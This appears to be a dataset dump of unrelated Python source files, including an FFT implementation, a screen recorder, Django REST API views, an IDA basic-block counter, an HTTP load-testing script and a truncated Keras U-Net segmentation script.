text stringlengths 8 6.05M |
|---|
class Solution:
def uniquePaths(self, m: int, n: int) -> int:
if min(m,n) == 1:
return 1
p = m+n-2
q = 1
for i in range(1,n-1):
q *= i+1
p *= (m+n-2-i)
return p//q |
import matplotlib.pyplot as plt
import numpy as np
from utils import *
import math
import cmath
# W(b)^i = exp(-j*2*pi*(i)/b)
def W(index, basic):
return cmath.exp(-1j * 2 * cmath.pi * (index) / basic)
# padding f to geExp2
def padding(f):
if len(f.shape) > 2:
cW, cH, c = f.shape
else:
cW, cH = f.shape
c = 1
rW = geExp2(cW)
rH = geExp2(cH)
if rW != cW:
f = np.concatenate((f, np.zeros((rW - cW, cH, c)) if c > 1 else np.zeros((rW - cW, cH))))
if rH != cH:
f = np.concatenate((f, np.zeros((rW, rH - cH, c)) if c > 1 else np.zeros((rW, rH - cH))), axis = 1)
return f
# 1-D FFT
def fft1d(f):
N = int(f.shape[0])
if N == 1:
return f
else:
Feven = fft1d(f[range(0, N, 2)])
Fodd = fft1d(f[range(1, N, 2)])
res = np.zeros(f.shape, dtype = complex)
K = int(N / 2)
for u in range(K):
res[u] = Feven[u] + Fodd[u] * W(u, N)
res[u + K] = Feven[u] - Fodd[u] * W(u, N)
return res
'''
FFT: Fast Fourier Transform
Input: an image f
Output: transformed F
'''
def FFT(f):
# get N, M and c
if len(f.shape) > 2:
M, N, c = f.shape
else:
M, N = f.shape
c = 1
# padding to 2^integer
f = padding(f)
if len(f.shape) > 2:
newM, newN, c = f.shape
else:
newM, newN = f.shape
c = 1
# result
res = np.zeros(f.shape, dtype = complex)
for i in range(c):
if c == 1:
fc = f
else:
fc = f[:,:,i]
rc = np.zeros(fc.shape, dtype = complex)
# 1-D FFT twice
for u in range(newM):
rc[u, :] = fft1d(fc[u, :])
for v in range(newN):
rc[:, v] = fft1d(rc[:, v])
if c == 1:
res = rc
else:
res[:,:,i] = rc
return res
'''
FFTShift: shift (0, 0) to center
'''
def FFTShift(f):
if len(f.shape) > 2:
M, N, c = f.shape
else:
M, N = f.shape
c = 1
res = np.zeros(f.shape, dtype = complex)
for i in range(c):
if c == 1:
fc = f
else:
fc = f[:,:,i]
rc = np.zeros(fc.shape, dtype = complex)
tmp = np.zeros(fc.shape, dtype = complex)
# move horizontally
for u in range(M):
for v in range(N):
newV = int(v + N / 2) % N
tmp[u, newV] = fc[u, v]
# move vertically
for v in range(N):
for u in range(M):
newU = int(u + M / 2) % M
rc[newU, v] = tmp[u, v]
if c == 1:
res = rc
else:
res[:, :, i] = rc
return res
'''
iFFT: inverse FFT
Notice: exp(-j) = exp(j).conjugate()
'''
def iFFT(F):
# get N, M and c
if len(F.shape) > 2:
M, N, c = F.shape
else:
M, N = F.shape
c = 1
# result
res = np.zeros(F.shape, dtype = complex)
for i in range(c):
if c == 1:
fc = F
else:
fc = F[:,:,i]
rc = np.zeros(fc.shape, dtype = complex)
# 1-D FFT twice
# conjugate
fc = fc.conj()
for u in range(M):
rc[u, :] = fft1d(fc[u, :])
for v in range(N):
rc[:, v] = fft1d(rc[:, v])
if c == 1:
res = rc
else:
res[:,:,i] = rc
res = res.conj() / (M * N)
return res
def Show(path, withNP = False):
f = plt.imread(path)
print(f.shape)
# my implementation
F = FFT(f)
FS = FFTShift(F)
iF = iFFT(FS)
F = np.log(np.abs(F) + np.ones(F.shape))
FS = np.log(np.abs(FS) + np.ones(FS.shape))
iF = np.abs(iF)
# numpy implementation
if withNP:
F1 = np.fft.fft2(f)
FS1 = np.fft.fftshift(F1)
iF1 = np.fft.ifft2(FS1)
F1 = np.log(np.abs(F1) + np.ones(F1.shape))
FS1 = np.log(np.abs(FS1) + np.ones(FS1.shape))
iF1 = np.abs(iF1)
# plt.imsave('../res/fftF.tif', F)
# plt.imsave('../res/fftFS.tif', FS)
# plt.imsave('../res/fftiF.tif', iF)
# plt.imsave('../res/fftFnp.tif', F1)
# plt.imsave('../res/fftFSnp.tif', FS1)
# plt.imsave('../res/fftiFnp.tif', iF1)
inputImage = [f, F, FS, iF]
titles = ['original', 'FFT', 'FFT Shift', 'inverse FFT']
if withNP:
inputImage.append(F1)
inputImage.append(FS1)
inputImage.append(iF1)
titles.extend(['FFT np', 'FFT Shift np', 'inverse FFT np'])
showImgN(inputImage, titles)
def main():
Show('../img/1.tif', True)
if __name__ == '__main__':
main() |
import cv2
import numpy as np
import pyautogui as p
rs = p.size()
fn = input("Enter the location where you want to store file:")
fps = 10.0
fourcc= cv2.VideoWriter_fourcc(*'XVID')
output = cv2.VideoWriter(fn, fourcc, fps, rs)
cv2.namedWindow("Live_Rec",cv2.WINDOW_NORMAL)
cv2.resizeWindow("Live_Rec", (600,400))
while True:
img = p.screenshot()
f = np.array(img)
f = cv2.cvtColor(f, cv2.COLOR_BGR2RGB)
output.write(f)
cv2.imshow("Live_Rec", f)
if cv2.waitKey(1) & 0xFF == ord('q'):
break
output.release()
cv2.destroyAllWindows()
|
# Author: Christian Brodbeck <christianbrodbeck@nyu.edu>
"""Fix up surfer.Brain"""
from surfer import Brain as SurferBrain
from ._brain_mixin import BrainMixin
class Brain(BrainMixin, SurferBrain):
def __init__(self, unit, *args, **kwargs):
BrainMixin.__init__(self, unit)
SurferBrain.__init__(self, *args, **kwargs)
|
from django.shortcuts import render
# Create your views here.
from django.http import HttpResponse
from django.http import JsonResponse
from rest_framework import status
from rest_framework.decorators import api_view
from rest_framework.views import APIView
from rest_framework.response import Response
from .models import *
from .serializers import *
from rest_framework import status
from rest_framework import generics
from django.contrib.auth.models import User
from rest_framework import permissions
from django.http import Http404
from django.contrib.auth.models import User
from .serializers import UserSerializer
class Klient_list(APIView):
permission_classes = [permissions.IsAuthenticatedOrReadOnly]
def get(self, request, format=None):
Klienci = Klient.objects.all()
serializer = KlientS(Klienci, many=True)
return Response(serializer.data)
def post(self, request, format=None):
serializer = KlientS(data=request.data)
if serializer.is_valid():
serializer.save()
return Response(serializer.data, status.HTTP_201_CREATED)
return Response(serializer.data, status.HTTP_400_BAD_REQUEST)
class Klient_list_detail(APIView):
permission_classes = [permissions.IsAuthenticatedOrReadOnly]
def get_object(self, pk):
try:
return Klient.objects.get(pk=pk)
except Klient.DoesNotExist:
raise Http404
def get(self, request, format=None):
Klie = self.get_object(pk)
serializer = KlientS(Klie)
return Response(serializer.data)
def post(self, request, format=None):
Klie = self.get_object(pk)
serializer = KlientS(Klie, data=request.data)
if serializer.is_valid():
serializer.save()
return Response(serializer.data)
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
def delete(self, request, pk, format=None):
Klie = self.get_object(pk)
Klie.delete()
return Response(status=status.HTTP_204_NO_CONTENT)
class Dane_F(APIView):
permission_classes = [permissions.IsAuthenticatedOrReadOnly]
def get(self, request, format=None):
Firmy = Dane_firmy.objects.all()
serializer = Dane_firmyS(Firmy, many=True)
return Response(serializer.data)
def post(self, request, format=None):
serializer = Dane_firmyS(data=request.data)
if serializer.is_valid():
serializer.save()
return Response(serializer.data, status.HTTP_201_CREATED)
return Response(serializer.data, status.HTTP_400_BAD_REQUEST)
class Dane_F_detail(APIView):
permission_classes = [permissions.IsAuthenticatedOrReadOnly]
def get_object(self, pk):
try:
return Dane_firmy.objects.get(pk=pk)
except Dane_firmy.DoesNotExist:
raise Http404
def get(self, request, format=None):
Firmy = self.get_object(pk)
serializer = Dane_firmyS(Firmy)
return Response(serializer.data)
def post(self, request, format=None):
Firmy = self.get_object(pk)
serializer = Dane_firmyS(Firmy, data=request.data)
if serializer.is_valid():
serializer.save()
return Response(serializer.data)
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
def delete(self, request, pk, format=None):
Firmy = self.get_object(pk)
Firmy.delete()
return Response(status=status.HTTP_204_NO_CONTENT)
class Pracownicy(APIView):
permission_classes = [permissions.IsAuthenticatedOrReadOnly]
def get(self, request, format=None):
Osoby = Personel.objects.all()
serializer = PersonelS(Osoby, many=True)
return Response(serializer.data)
def post(self, request, format=None):
serializer = PersonelS(data=request.data)
if serializer.is_valid():
serializer.save()
return Response(serializer.data, status.HTTP_201_CREATED)
return Response(serializer.data, status.HTTP_400_BAD_REQUEST)
class Pracownicy_detail(APIView):
permission_classes = [permissions.IsAuthenticatedOrReadOnly]
def get_object(self, pk):
try:
return Personel.objects.get(pk=pk)
except Personel.DoesNotExist:
raise Http404
def get(self, request, format=None):
Osoby = self.get_object(pk)
serializer = PersonelS(Osoby)
return Response(serializer.data)
def post(self, request, format=None):
Osoby = self.get_object(pk)
serializer = PersonelS(Osoby, data=request.data)
if serializer.is_valid():
serializer.save()
return Response(serializer.data)
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
def delete(self, request, pk, format=None):
Osoby = self.get_object(pk)
Osoby.delete()
return Response(status=status.HTTP_204_NO_CONTENT)
class Zlecenia_p(APIView):
permission_classes = [permissions.IsAuthenticatedOrReadOnly]
def get(self, request, format=None):
Zlecenie = Zlecenia.objects.all()
serializer = ZleceniaS(Zlecenie, many=True)
return Response(serializer.data)
def post(self, request, format=None):
serializer = ZleceniaS(data=request.data)
if serializer.is_valid():
serializer.save()
return Response(serializer.data, status.HTTP_201_CREATED)
return Response(serializer.data, status.HTTP_400_BAD_REQUEST)
class Zlecenia_p_detail(APIView):
permission_classes = [permissions.IsAuthenticatedOrReadOnly]
def get_object(self, pk):
try:
return Zlecenia.objects.get(pk=pk)
except Zlecenia.DoesNotExist:
raise Http404
def get(self, request, format=None):
Zlecenie = self.get_object(pk)
serializer = PersonelS(Zlecenie)
return Response(serializer.data)
def post(self, request, format=None):
Zlecenie = self.get_object(pk)
serializer = ZleceniaS(Zlecenie, data=request.data)
if serializer.is_valid():
serializer.save()
return Response(serializer.data)
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
def delete(self, request, pk, format=None):
Zlecenie = self.get_object(pk)
Zlecenie.delete()
return Response(status=status.HTTP_204_NO_CONTENT)
class Obecnosci(APIView):
permission_classes = [permissions.IsAuthenticatedOrReadOnly]
def get(self, request, format=None):
Jest = Obecnosc.objects.all()
serializer = ObecnoscS(Jest, many=True)
return Response(serializer.data)
def post(self, request, format=None):
serializer = ObecnoscS(data=request.data)
if serializer.is_valid():
serializer.save()
return Response(serializer.data, status.HTTP_201_CREATED)
return Response(serializer.data, status.HTTP_400_BAD_REQUEST)
class Obecnosci_detail(APIView):
permission_classes = [permissions.IsAuthenticatedOrReadOnly]
def get_object(self, pk):
try:
return Obecnosc.objects.get(pk=pk)
except Obecnosc.DoesNotExist:
raise Http404
def get(self, request, format=None):
Jest = self.get_object(pk)
serializer = ObecnoscS(Jest)
return Response(serializer.data)
def post(self, request, format=None):
Jest = self.get_object(pk)
serializer = ObecnoscS(Jest, data=request.data)
if serializer.is_valid():
serializer.save()
return Response(serializer.data)
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
def delete(self, request, pk, format=None):
Jest = self.get_object(pk)
Jest.delete()
return Response(status=status.HTTP_204_NO_CONTENT)
class UserList(generics.ListAPIView):
queryset = User.objects.all()
serializer_class = UserSerializer
class UserDetail(generics.RetrieveAPIView):
queryset = User.objects.all()
serializer_class = UserSerializer
|
from repository_analyzers.offline.i_repository_analyzer import IRepositoryAnalyzer
from abc import ABCMeta, abstractmethod
import os
class AbstractRepositoryAnalyzer(IRepositoryAnalyzer):
"""
Abstract base class for repository-analysis plug-ins.
"""
__metaclass__ = ABCMeta
def __init__(self, package_analyzers, file_analyzers):
"""
Constructor for all classes that continue to implement this class.
:param package_analyzers:
:param file_analyzers:
"""
self._repo_details = dict()
self.package_analyzers = package_analyzers
self.file_analyzers = file_analyzers
@abstractmethod
def _analyze(self, path, repo_details) -> iter:
"""
Analyzes all repositories based on their repository type, and yield returns the origin URL.
:param path: Path to the repositories.
:param repo_details: Details to the repository.
:return:
"""
raise NotImplementedError
def get_details(self, remote: str) -> None:
"""
Gets the details of a repository based on its remote URL.
:param remote: Remote URL.
:return: None
"""
if remote not in self._repo_details:
self._repo_details[remote] = dict()
self._repo_details[remote]["url"] = remote
return self._repo_details[remote]
def initialize_details(self, remote: str) -> None:
"""
Initializes fields for file analyzers.
:param remote: Remote URL.
:return: None
"""
for file_analyzer in self.file_analyzers:
file_analyzer.initialize_fields(self.get_details(remote))
def __process_files(self, directory: str, remote: str) -> None:
"""
Analyzes all files inside a directory.
:param directory: Repository root directory.
:param remote: Remote
:return: None.
"""
self.initialize_details(remote)
# Build file-list.
filelist = list()
for path, subdirectory, files in os.walk(directory):
for name in files:
filelist.append(os.path.join(path, name))
for file_anlayzer in self.file_analyzers:
file_anlayzer.analyze_files(filelist, self.get_details(remote))
def analyze_repositories(self, path: str, repo_details: dict) -> None:
# Add generic analysis to the tasks that are performed.
for repo_path, remote in self._analyze(path, repo_details):
self.__analyze_packages(repo_path, remote)
self.__process_files(repo_path, remote)
def __analyze_packages(self, path: str, remote: str) -> None:
"""
Analyze package-files of a repository.
:param path: Path to root containing files to analyze.
:param remote: Remote URL of the repository containing the file.
:return: None
"""
for package_analyzer in self.package_analyzers:
if "packages" not in self.get_details(remote):
self.get_details(remote)["packages"] = list()
self.get_details(remote)["packages"].extend(package_analyzer.analyze(path))
|
# -*- coding: utf-8 -*-
"""
used for calculate the number of basicblocks of a binary file
the result will be written in ./data.txt
"""
import idaapi
import idc
def getBasicblocksByAddr(tgtEA):
if tgtEA is None:
exit
f = idaapi.get_func(tgtEA)
if not f:
print "No function at 0x%x" % (tgtEA)
exit
fc = idaapi.FlowChart(f)
numBlocks =0;
for block in fc:
# print "block [0x%x - 0x%x)" % (block.startEA, block.endEA)
numBlocks = numBlocks + 1;
#if block.startEA <= tgtEA:
#if block.endEA > tgtEA:
#print "0x%x is part of block [0x%x - 0x%x)" % (tgtEA, block.startEA, block.endEA)
return numBlocks
def main():
funcs = Functions()
totalBlocks = 0;
for f in funcs:
name = Name(f)
end = GetFunctionAttr(f, FUNCATTR_END)
locals = GetFunctionAttr(f, FUNCATTR_FRSIZE)
functionBasicBlocks = getBasicblocksByAddr(f)
totalBlocks += functionBasicBlocks
# Message("Function: %s, starts at %x, ends at %x, with %d blocks\n" % (name, f, end, functionBasicBlocks))
Message("Total: %d blocks\n" % (totalBlocks));
log_file_uri = os.path.dirname(os.path.realpath(__file__)) + '/data.txt'
log_file = open(log_file_uri, 'a')
log_file.write('Total basicblocks: ' + str(totalBlocks) + '\n')
log_file.close()
# return 1
idc.Exit(0); # Exit IDA Pro
if __name__ == '__main__':
main() |
import pygame.font
import pygame
class Button():
def __init__(self, game_settings, screen, msg, color = (0, 0, 0, 0),
text_color = (255, 255, 255)):
self.screen = screen
self.game_settings = game_settings
self.msg = str(msg)
self.width, self.height = 1, 1
self.color = color
self.text_color = text_color
self.font = pygame.font.Font('font/Boxy-Bold.ttf', 150)
self.prep_msg()
self.rect.center = self.screen.get_rect().center
def prep_msg(self):
self.msg_image = self.font.render(self.msg, True, self.text_color, self.color)
self.rect = self.msg_image.get_rect()
def draw_button(self):
self.screen.fill(self.color, self.rect)
self.screen.blit(self.msg_image, self.rect)
|
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
import datetime
def interval_in_day(time, interval):
dt = datetime.datetime.strptime(str(time), "%Y%m%d%H%M%S")
dt_base = datetime.datetime(dt.year, dt.month, dt.day, 0, 0, 0)
return int((dt - dt_base).total_seconds() / (interval * 60))
|
number = int(input("Please enter an integer number:"))
print("The next number for the number ", number, "is", (number+1), "\nThe previous number for the number ", number,
"is", (number-1))
|
from datetime import datetime
from django.urls import reverse
from rest_framework import serializers
from .view_helpers import description_from_notes
class ExternalIdentifierSerializer(serializers.Serializer):
identifier = serializers.CharField()
source = serializers.CharField()
class DateSerializer(serializers.Serializer):
expression = serializers.CharField()
begin = serializers.DateField()
end = serializers.CharField(allow_null=True)
label = serializers.DateField()
type = serializers.CharField()
class ExtentSerializer(serializers.Serializer):
value = serializers.FloatField()
type = serializers.CharField()
class LanguageSerializer(serializers.Serializer):
expression = serializers.CharField()
identifier = serializers.CharField()
class SubnoteSerializer(serializers.Serializer):
type = serializers.CharField()
content = serializers.SerializerMethodField()
def get_content(self, obj):
"""Coerce content into a list so it can be serialized as JSON."""
return list(obj.content)
class NoteSerializer(serializers.Serializer):
type = serializers.CharField()
title = serializers.CharField()
source = serializers.CharField()
subnotes = SubnoteSerializer(many=True)
class RightsGrantedSerializer(serializers.Serializer):
act = serializers.CharField()
begin = serializers.DateField()
end = serializers.DateField()
restriction = serializers.CharField()
notes = NoteSerializer(many=True, allow_null=True)
class RightsStatementSerializer(serializers.Serializer):
determination_date = serializers.DateField()
type = serializers.CharField()
rights_type = serializers.CharField()
begin = serializers.DateField()
end = serializers.DateField()
copyright_status = serializers.CharField(allow_null=True)
other_basis = serializers.CharField(allow_null=True)
jurisdiction = serializers.CharField(allow_null=True)
notes = NoteSerializer(many=True, allow_null=True)
rights_granted = RightsGrantedSerializer(many=True)
class GroupSerializer(serializers.Serializer):
identifier = serializers.CharField()
title = serializers.CharField()
class ReferenceSerializer(serializers.Serializer):
title = serializers.CharField()
type = serializers.CharField(allow_null=True)
online = serializers.SerializerMethodField()
hit_count = serializers.IntegerField(allow_null=True)
online_hit_count = serializers.IntegerField(allow_null=True)
uri = serializers.SerializerMethodField()
dates = serializers.CharField(allow_null=True)
description = serializers.CharField(allow_null=True)
group = GroupSerializer(allow_null=True)
index = serializers.IntegerField(source="position", allow_null=True)
def get_online(self, obj):
return getattr(obj, "online", False)
def get_uri(self, obj):
if getattr(obj, "uri", None):
return obj.uri.rstrip('/')
basename = obj.type
if basename in ["person", "organization", "family", "software"]:
basename = "agent"
elif basename in ["cultural_context", "function", "geographic",
"genre_form", "occupation", "style_period", "technique",
"temporal", "topical"]:
basename = "term"
return reverse('{}-detail'.format(basename), kwargs={"pk": obj.identifier})
class BaseListSerializer(serializers.Serializer):
uri = serializers.SerializerMethodField()
type = serializers.CharField()
title = serializers.CharField()
dates = DateSerializer(many=True, allow_null=True)
def get_uri(self, obj):
basename = self.context.get('view').basename or obj.type
return reverse('{}-detail'.format(basename), kwargs={"pk": obj.meta.id})
class BaseDetailSerializer(serializers.Serializer):
uri = serializers.SerializerMethodField()
title = serializers.CharField()
type = serializers.CharField()
category = serializers.CharField(allow_null=True)
offset = serializers.IntegerField(allow_null=True)
group = GroupSerializer()
external_identifiers = ExternalIdentifierSerializer(many=True)
def get_uri(self, obj):
basename = self.context.get('view').basename or obj.type
return reverse('{}-detail'.format(basename), kwargs={"pk": obj.meta.id})
class AgentSerializer(BaseDetailSerializer):
agent_type = serializers.CharField()
authorized_name = serializers.CharField()
description = serializers.CharField(allow_null=True)
dates = DateSerializer(many=True, allow_null=True)
notes = NoteSerializer(many=True, allow_null=True)
class AgentListSerializer(BaseListSerializer):
pass
class CollectionSerializer(BaseDetailSerializer):
level = serializers.CharField()
parent = serializers.CharField(allow_null=True)
languages = LanguageSerializer(many=True, allow_null=True)
description = serializers.SerializerMethodField()
extents = ExtentSerializer(many=True)
formats = serializers.ListField()
online = serializers.BooleanField()
dates = DateSerializer(many=True, allow_null=True)
notes = NoteSerializer(many=True, allow_null=True)
rights_statements = RightsStatementSerializer(many=True, allow_null=True)
agents = ReferenceSerializer(many=True, allow_null=True)
creators = ReferenceSerializer(many=True, allow_null=True)
terms = ReferenceSerializer(many=True, allow_null=True)
def get_description(self, obj):
return description_from_notes(getattr(obj, "notes", []))
class CollectionListSerializer(BaseListSerializer):
pass
class ObjectSerializer(BaseDetailSerializer):
languages = LanguageSerializer(many=True, allow_null=True)
parent = serializers.CharField(allow_null=True)
description = serializers.SerializerMethodField()
extents = ExtentSerializer(many=True, allow_null=True)
formats = serializers.ListField()
online = serializers.BooleanField()
dates = DateSerializer(many=True, allow_null=True)
notes = NoteSerializer(many=True, allow_null=True)
rights_statements = RightsStatementSerializer(many=True, allow_null=True)
agents = ReferenceSerializer(many=True, allow_null=True)
terms = ReferenceSerializer(many=True, allow_null=True)
def get_description(self, obj):
return description_from_notes(getattr(obj, "notes", []))
class ObjectListSerializer(BaseListSerializer):
pass
class TermSerializer(BaseDetailSerializer):
term_type = serializers.CharField()
collections = ReferenceSerializer(many=True, allow_null=True)
objects = ReferenceSerializer(many=True, allow_null=True)
class TermListSerializer(BaseListSerializer):
pass
class CollectionHitSerializer(serializers.Serializer):
"""Serializes data for collapsed hits."""
category = serializers.CharField(source="group.category")
dates = serializers.SerializerMethodField()
hit_count = serializers.IntegerField()
online_hit_count = serializers.IntegerField(allow_null=True)
title = serializers.CharField(source="group.title")
uri = serializers.SerializerMethodField()
creators = serializers.SerializerMethodField()
def get_dates(self, obj):
return [d.to_dict() for d in obj.group.dates]
def get_creators(self, obj):
if getattr(obj.group, "creators", None):
return [c.title for c in obj.group.creators]
else:
return []
def get_uri(self, obj):
return obj.group.identifier.rstrip("/")
class FacetSerializer(serializers.Serializer):
"""Serializes facets."""
def to_representation(self, instance):
resp = {}
for k, v in instance.aggregations.to_dict().items():
if "buckets" in v:
resp[k] = v["buckets"]
elif "name" in v: # move nested aggregations up one level
resp[k] = v["name"]["buckets"]
elif k in ["max_date", "min_date"]: # convert timestamps to year
value = (datetime.fromtimestamp(v["value"] / 1000.0).year) if v["value"] else None
resp[k] = {"value": value}
else:
resp[k] = v
return resp
class AncestorsSerializer(serializers.Serializer):
"""Provides a nested dictionary representation of ancestors."""
def serialize_ancestors(self, ancestor_list, tree, idx):
ancestor = ancestor_list[idx]
serialized = ReferenceSerializer(ancestor).data
tree_data = {**serialized, **tree}
if idx == len(ancestor_list) - 1:
new_tree = tree_data
return new_tree
else:
new_tree = {"child": tree_data}
return self.serialize_ancestors(ancestor_list, new_tree, idx + 1)
def to_representation(self, instance):
resp = {}
if instance:
resp = self.serialize_ancestors(instance, {}, 0)
return resp
|
from django.urls import path
# from rest_framework.authtoken.views import obtain_auth_token
from rest_framework_jwt.views import obtain_jwt_token,refresh_jwt_token,verify_jwt_token
urlpatterns = [
# path ('api-token-auth/',obtain_auth_token),
path('api-jwt-auth/',obtain_jwt_token),
path('api-jwt-auth/refresh/',refresh_jwt_token),
path('api-jwt-auth/verify',verify_jwt_token),
]
|
def test(a):
times_list = []
times_list_str = []
n = int(a[0])
for i in range(1, n+1):
# print(a[i])
times_list_str.append(str(a[i]))
print(times_list_str[i-1])
times_list.append(int(str(a[i]).replace(':', '')))
print(times_list[i-1])
a = [10, '15:41:24', '21:40:40', '05:27:01', '13:37:33', '07:40:36', '08:03:28', '03:46:47', '20:05:22', '04:04:57', '04:34:40']
test(a)
|
import requests
import json
import sys
import time
import os
import threading
time_request_thread=[]
status_code_thread=[]
threads = []
threadLock = threading.Lock()
class myThread (threading.Thread):
def __init__(self, threadID, name, callnumber,type,url):
threading.Thread.__init__(self)
self.threadID = threadID
self.name = name
self.number= callnumber
self.type = type
self.url= url
def run(self):
time_requestT= time.time()
startThread(self.name,self.number,self.type,self.url)
time_endedT = time.time() - time_requestT
print("finished "+ self.name+" Time: "+str(time_endedT))
def writeData(time,status):
threadLock.acquire()
time_request_thread.append(time)
status_code_thread.append(status)
threadLock.release()
def startThread(name,number,type,url):
if type=="get":
for i in range(0, number):
time_request= time.time()
status=getData(url)
time_ended = time.time() - time_request
print("thread:"+name+" Request Time:"+str(time_ended)+" status:"+str(status))
writeData(time_ended,status)
print("Request number: "+str(i+1))
elif type=="post":
for i in range(0, number):
time_request= time.time()
status=postData(url)
time_ended = time.time() - time_request
print("thread:"+name+" Request Time:"+str(time_ended)+" status:"+str(status))
writeData(time_ended,status)
print("Request number: "+str(i+1))
def getData(url):
r = requests.get(url)
return r.status_code
def postData(url):
with open('data.json') as json_data:
data= json.load(json_data)
r= requests.post(url=url,json=data)
return r.status_code
def main(argv):
if int(argv[1])>1:
nthreads = int(argv[1])
for i in range(0,nthreads):
thread = myThread(i+1,"thread-"+str(i),int(argv[2]),argv[3],argv[4])
thread.start()
threads.append(thread)
for t in threads:
t.join()
totalMed=0
countStatus=0
for i in time_request_thread:
totalMed= totalMed + i
totalMed= totalMed/len(time_request_thread)
for stat in status_code_thread:
if stat== 200:
countStatus= countStatus+1
os.system('cls' if os.name=='nt' else 'clear')
print("All done!")
print("Biggest time waited:"+ str(max(time_request_thread)))
print("Smallest time waited:"+ str(min(time_request_thread)))
print("Average Time waited:"+str(totalMed))
print("200 status code = "+ str(countStatus) +" in "+ str(len(status_code_thread)) )
elif int(argv[1])==0:
if argv[3]=="get":
start_time = time.time()
calls = int(argv[2])
for i in range(0, calls):
time_request= time.time()
status=getData(argv[4])
time_ended = time.time() - time_request
os.system('cls' if os.name=='nt' else 'clear')
print("Request Time:"+str(time_ended)+" status:"+str(status))
time_request_thread.append(time_ended)
writeData(time_ended,status)
print("Request number: "+str(i+1))
elapsed_time = time.time() - start_time
print("All done!")
print("Final Time:"+str(elapsed_time))
totalMed=0
countStatus=0
for i in time_request_thread:
totalMed= totalMed + i
totalMed= totalMed/len(time_request_thread)
for stat in status_code_thread:
if stat== 200:
countStatus= countStatus+1
print("Biggest time waited:"+ str(max(time_request_thread)))
print("Smallest time waited:"+ str(min(time_request_thread)))
print("Average Time waited:"+str(totalMed))
print("200 status code = "+ str(countStatus) +" in "+ str(len(status_code_thread)) )
elif argv[3]=="post":
start_time = time.time()
calls = int(argv[2])
for i in range(0, calls):
time_request= time.time()
status=postData(argv[4])
time_ended = time.time() - time_request
os.system('cls' if os.name=='nt' else 'clear')
print("Request Time:"+str(time_ended) +" status:"+str(status))
time_request_thread.append(time_ended)
writeData(time_ended,status)
print("Request number: "+str(i+1))
elapsed_time = time.time() - start_time
print("All done!")
print("Final Time:"+str(elapsed_time))
totalMed=0
countStatus=0
for i in time_request_thread:
totalMed= totalMed + i
totalMed= totalMed/len(time_request_thread)
for stat in status_code_thread:
if stat== 200:
countStatus= countStatus+1
print("Biggest time waited:"+ str(max(time_request_thread)))
print("Smallest time waited:"+ str(min(time_request_thread)))
print("Average Time waited:"+str(totalMed))
print("200 status code = "+ str(countStatus) +" in "+ str(len(status_code_thread)) )
else:
print("Can't be lower than 0 or empty")
if __name__ == "__main__":
main(sys.argv)
|
# -*- coding: utf-8 -*-
"""
******************************************************************************
* @author : Jabed-Akhtar
* @Created on : Mon Mar 14 23:04:05 2022
******************************************************************************
* @file : UNet_keras_imageSegmentation.py
* @brief : using U-Net for Image-Segmentation
******************************************************************************
* :Steps :
* 1. Importing python libraries
* 2. Defining variables
* 3. Reading images from folders as data to be trained
* 4. Building the U-Net model
* i. Contraction path
* ii. Expansive path
* 5. Fitting model to data
* 6. Predictions
* :Description:
* - a source used within this script: https://github.com/bnsreenu/python_for_microscopists
* - a picture/doc for understanding the U-Net architecture: '/cnn_architectures_examples_ws/docs_images/UNet_modifiedArchitecture.jpg'
* - dataset can be found at: https://www.kaggle.com/c/data-science-bowl-2018
* -> used datasets: 'data-science-bowl-2018/stage1_teststage1_test/' and 'data-science-bowl-2018/stage1_train/'
*
******************************************************************************
"""
#Imports ======================================================================
import os
import random
# Just disables the warning, doesn't take advantage of AVX/FMA to run faster
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'
import numpy as np
from tqdm import tqdm # for progress-bar feature
import tensorflow as tf
#import tensorflow.keras
from skimage.io import imread, imshow
from skimage.transform import resize
import matplotlib.pyplot as plt
#Variables ====================================================================
TRAIN_PATH = 'datasets/data-science-bowl-2018/stage1_train/'
TEST_PATH = 'datasets/data-science-bowl-2018/stage1_test/'
IMG_WIDTH = 128
IMG_HEIGHT = 128
IMG_CHANNELS = 3
seed = 42
np.random.seed = seed
train_ids = next(os.walk(TRAIN_PATH))[1]
test_ids = next(os.walk(TEST_PATH))[1]
X_train = np.zeros((len(train_ids), IMG_HEIGHT, IMG_WIDTH, IMG_CHANNELS), dtype=np.uint8)
Y_train = np.zeros((len(train_ids), IMG_HEIGHT, IMG_WIDTH, 1), dtype=np.bool)
X_test = np.zeros((len(test_ids), IMG_HEIGHT, IMG_WIDTH, IMG_CHANNELS), dtype=np.uint8)
#Reading images from folders ==================================================
print('Resizing training images and masks')
for n, id_ in tqdm(enumerate(train_ids), total=len(train_ids)):
path = TRAIN_PATH + id_
img = imread(path + '/images/' + id_ + '.png')[:,:,:IMG_CHANNELS]
img = resize(img, (IMG_HEIGHT, IMG_WIDTH), mode='constant', preserve_range=True)
X_train[n] = img #Filling empty X_train with values from img
mask = np.zeros((IMG_HEIGHT, IMG_WIDTH, 1), dtype=np.bool)
for mask_file in next(os.walk(path + '/masks/'))[2]:
mask_ = imread(path + '/masks/' + mask_file)
mask_ = np.expand_dims(resize(mask_, (IMG_HEIGHT, IMG_WIDTH), mode='constant',
preserve_range=True), axis=-1)
mask = np.maximum(mask, mask_)
Y_train[n] = mask
print('Resizing testing images and masks')
sizes_test = []
for n, id_ in tqdm(enumerate(test_ids), total=len(test_ids)):
path = TEST_PATH + id_
img = imread(path + '/images/' + id_ + '.png')[:,:,:IMG_CHANNELS]
sizes_test.append([img.shape[0], img.shape[1]])
img = resize(img, (IMG_HEIGHT, IMG_WIDTH), mode='constant', preserve_range=True)
X_test[n] = img
print('Done!')
image_x = random.randint(0, len(train_ids))
imshow(X_train[image_x])
plt.show()
#imshow(np.squeeze(Y_train[image_x]))
#plt.show()
plt.imshow(Y_train[image_x])
plt.show()
#Building the model ===========================================================
inputs = tf.keras.layers.Input((IMG_HEIGHT, IMG_WIDTH, IMG_CHANNELS))
#Contraction path *****
s = tf.keras.layers.Lambda(lambda x: x / 255)(inputs)
c1 = tf.keras.layers.Conv2D(16, (3,3), activation='relu', kernel_initializer='he_normal', padding='same')(s)
c1 = tf.keras.layers.Dropout(0.1)(c1)
c1 = tf.keras.layers.Conv2D(16, (3,3), activation='relu', kernel_initializer='he_normal', padding='same')(c1)
